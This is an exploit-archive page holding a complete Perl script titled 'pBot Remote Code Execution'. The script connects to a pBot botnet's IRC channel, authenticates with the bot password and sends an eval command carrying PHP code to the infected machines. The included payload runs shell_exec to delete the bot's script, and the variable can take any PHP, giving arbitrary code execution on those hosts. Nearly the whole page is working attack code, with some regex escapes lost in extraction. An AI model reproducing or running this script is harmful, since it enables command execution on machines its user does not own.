Home / exploits pBot Remote Code Execution
Posted on 01 August 2012
#!/usr/bin/perl # Exploit Title: pBot Remote Code Execution ("*" hostauth) # Date: 31.07.2012 # Exploit Author: @bwallHatesTwits # Software Link: https://www.firebwall.com/decoding/read.php?u=620d21fd31b87046e94975e03fdafa8a (decoded from attempted attack) # Version: Various versions # Tested on: Linux 3.2 use IO::Socket; use IO::Select; use IO::Socket::INET; use Socket; my $nickname = "BotSlayer"; my $ident = "BotSlayer"; my $fullname = "BotSlayer"; $sel_client = IO::Select->new(); #configuration values from the bot source $ircserver = "localhost"; #"server" $ircserverpass = ""; #"pass" my $ircport = "6667"; #"port" #if "key" is set, then add a space and the password to the chan name my @channels = ("#anonbxu"); #"chan" and "chan2" $botPass = "hello"; #"password" $botTrigger = "."; #"trigger" #hostauth must be "*" $loginCMD = "user"; #usually user or login #payload - PHP code to run #This version deletes the bots originating script, and dies $phpEval = "shell_exec("rm -f ".$_SERVER['SCRIPT_NAME']);exit();"; $channelCount = scalar(@channels); sub onJoin { my $channel = shift; $channel = substr($channel, 1); print "Joined $channel "; say($channel, $botTrigger.$loginCMD." $botPass"); sleep(1); say($channel, $botTrigger."eval @BallastSec ".$phpEval); print "Payload delivered "; tryQuit(); } sub tryQuit { $channelCount--; if($channelCount == 0) { quit("whomp wha"); } } sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1] "; } else { print $IRC_cur_socket "$_[0] "; } } sub conn { my $mynick = $_[0]; my $ircserver_con = $_[1]; my $ircport_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; if($ircserverpass != "") { sendraw("PASS ".$ircserverpass); } sendraw("NICK ".$mynick); sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname"); sleep 1; } } sub parse { my $servarg = shift; print $servarg." "; if ($servarg =~ /^PING :(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?) JOIN (.+)/) { my $channel = $4; onJoin($channel); } elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?) PRIVMSG (.+?) :(.+)/) { my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; if ($args =~ /^�01VERSION�01$/) { notice("$pn", "�01VERSION BotSlayer by Ballast Security�01"); } if ($args =~ /^(Q$mynickE|!a)s+(.*)/ ) { my $natrix = $1; my $arg = $2; } } elsif ($servarg =~ /^:(.+?)!(.+?)@(.+?)s+NICKs+:(S+)/i) { if (lc($1) eq lc($mynick)) { $mynick=$4; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; } } elsif ($servarg =~ m/^:(.+?)s+001s+(S+)s/i) { $mynick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; foreach(@channels) { sendraw("JOIN $_"); } } } my $line_temp; while(1) { while (!(keys(%irc_servers))) { conn($nickname, $ircserver, $ircport); } delete($irc_servers{''}) if (defined($irc_servers{''})); my @ready = $sel_client->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $mynick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $msg, 4096); if ($nread == 0) { $sel_client->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/ /, $msg); $msg =~ s/ $//; for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line=$line_temp.$line if ($line_temp); $line_temp=''; $line =~ s/ $//; parse("$line"); } } } sub say { return unless $#_ == 1; sendraw("PRIVMSG $_[0] :$_[1]"); } sub notice { return unless $#_ == 1; sendraw("NOTICE $_[0] :$_[1]"); } sub join { sendraw("JOIN $_[0]"); } sub part { sendraw("PART $_[0]"); } sub quit { sendraw("QUIT :$_[0]"); exit; }
